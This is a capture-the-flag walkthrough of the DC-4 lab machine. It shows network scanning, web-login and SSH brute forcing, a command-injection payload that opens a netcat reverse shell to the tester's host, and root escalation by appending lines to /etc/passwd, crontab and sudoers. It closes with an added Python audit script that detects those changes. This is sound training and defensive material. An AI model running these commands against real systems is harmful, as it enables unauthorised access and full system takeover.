DC-4
Routine IP and port scan:
root@kali:~# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:e1:4d, IPv4: 192.168.32.135
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
......
192.168.32.145 00:0c:29:b3:0a:ad VMware, Inc.
......
root@kali:~# nmap 192.168.32.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 02:22 EDT
Nmap scan report for 192.168.32.145
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:B3:0A:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds
Oh ho, SSH + HTTP this time, another guess-the-credentials-and-log-in routine? Let's look at port 80 first.
It is an Admin Information System Login page that demands a username and password right away. Who could withstand that? Brute force it, what else is there to do...
Brute forcing finds that happy is the password, and the login returns a 302 redirect. Once inside we are handed a "run command" feature; although it is limited to three commands, it would be a disservice not to intercept the request and execute an arbitrary command. That works, so try a reverse shell:
Reverse shell
radio=nc+-e+/bin/bash+192.168.32.135+9999&submit=Run
python -c 'import pty; pty.spawn("/bin/bash")'
The reverse shell connects back; we have a shell!
Going into the home directory shows three user accounts: charles, jim and sam. Looking through each folder in turn, only jim's contains a file named old-passwords.bak. Save it locally, turn it into a wordlist and go brute-force SSH (a bit like the DC-2 approach).
Make the three usernames and the passwords into wordlists and brute-force with hydra:
root@kali:~# hydra -L user.txt -P passwd.txt ssh://192.168.32.145
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-15 10:29:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.32.145:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 580 to do in 00:04h, 16 active
[22][ssh] host: 192.168.32.145 login: jim password: jibril04
One credential pair is cracked: login jim, password jibril04. Connect and take a look.
jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
Of the three files, the other two had already been checked; opening mbox shows it is an email, so go look in /var/mail as well. Sure enough, that pays off!
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
That gives us charles's password. After logging in, following the teaching of the masters, the usual first step is sudo -l to check the user's privileges. When jim was checked earlier he had nothing usable, but charles can run /usr/bin/teehee without a password. Sure enough, people who are close to the boss have unusual privileges.
charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
Looking at how teehee is used, it really is amazing: -a appends to the end of the file instead of overwriting it.
Privilege escalation
Method 1: add a new root-privileged user directly
Because charles can run teehee without a password and teehee can write to files, combining it with sudo lets us add a new user.
charles@dc-4:~$ echo "Tr0jAn::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Tr0jAn::0:0:::/bin/bash
charles@dc-4:~$ su Tr0jAn
root@dc-4:/home/charles#
Root obtained. Note that with this method only one root user can be online at a time; if the real root user is logged in, the passwordless escalation will not work!
Field explanation
Tr0jAn::0:0:::/bin/bash
[username]:[password]:[UID]:[GID]:[comment (GECOS)]:[home directory]:[login shell]
Method 2: escalate by executing a script through an important file
The relatively important files on Linux are essentially the scheduled task file (crontab) and the sudoers file.
1. Scheduled task file (crontab)
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ /bin/sh
# whoami
root
2. sudoers file
Look at how the sudoers file is written on the Kali machine, then write a matching entry on the target:
root@kali:~# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
@includedir /etc/sudoers.d
It looks like all that is needed is to write charles ALL=(ALL:ALL) ALL into the /etc/sudoers file:
charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
(ALL : ALL) ALL
charles@dc-4:~$ sudo /bin/bash
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for charles:
root@dc-4:/home/charles# whoami
root
After the write succeeds, sudo -l shows that the allowed commands are now ALL, so any command can be run: sudo /bin/bash, enter charles's login password, and that is it. Finally, get the flag!
root@dc-4:/# find / -name "*flag*"
......
/root/flag.txt
......
root@dc-4:/# cat /root/flag
cat: /root/flag: No such file or directory
root@dc-4:/# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Knowledge points used on this box:
1. Weak login password;
2. Arbitrary code execution vulnerability;
3. Information disclosure through mail;
4. A low-privilege account can run a high-privilege command without a password;
5. Unauthorized modification of data, leading to privilege escalation.
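The appends in Method 1 and Method 2 leave traces a defender can look for: a second UID-0 account with an empty password field in /etc/passwd, and a sudoers rule that hands a file-writing tool (here teehee, a renamed tee) to a user without a password, followed by a blanket ALL grant. The audit script below is an added example and not part of the original writeup; the sample file contents and the sudoers-syntax form of the charles rule are constructed to mirror what the writeup shows.

```python
# Constructed samples: the normal entries plus the lines appended via sudo teehee -a.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:,,,:/home/charles:/bin/bash
Tr0jAn::0:0:::/bin/bash
"""
SAMPLE_SUDOERS = """Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD: /usr/bin/teehee
charles ALL=(ALL:ALL) ALL
"""
# Tools that copy stdin into a file: run as root without a password they are an
# arbitrary file write (teehee is the renamed tee on this box).
FILE_WRITERS = {"tee", "teehee"}

def audit_passwd(text: str) -> list[str]:
    """Flag malformed entries, non-root UID-0 accounts and empty password fields."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"passwd line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if uid == "0" and name != "root":
            findings.append(f"passwd line {lineno}: extra UID-0 account {name!r}, shell {shell}")
        if pw == "":
            findings.append(f"passwd line {lineno}: account {name!r} has an empty password field")
    return findings

def audit_sudoers(text: str) -> list[str]:
    """Flag NOPASSWD rules (worst on file-writing tools) and non-root ALL grants."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith(("#", "@", "Defaults")):
            continue
        user, _, spec = line.partition(" ")
        cmds = spec.partition("=")[2].strip()
        if cmds.startswith("("):  # drop the (runas) part
            cmds = cmds[cmds.index(")") + 1:].strip()
        if cmds.startswith("NOPASSWD:"):
            cmd_list = [c.strip() for c in cmds[len("NOPASSWD:"):].split(",")]
            why = " (arbitrary file write as root)" if any(c.rsplit("/", 1)[-1] in FILE_WRITERS for c in cmd_list) else ""
            findings.append(f"sudoers line {lineno}: {user} runs {cmd_list} without a password{why}")
        if cmds == "ALL" and user not in ("root", "%sudo"):
            findings.append(f"sudoers line {lineno}: {user} granted unrestricted ALL")
    return findings
```

On a live host, pass the contents of /etc/passwd and /etc/sudoers (plus /etc/sudoers.d/*) to the same two functions; a non-root UID-0 entry or an empty password field is never legitimate on a stock Debian install.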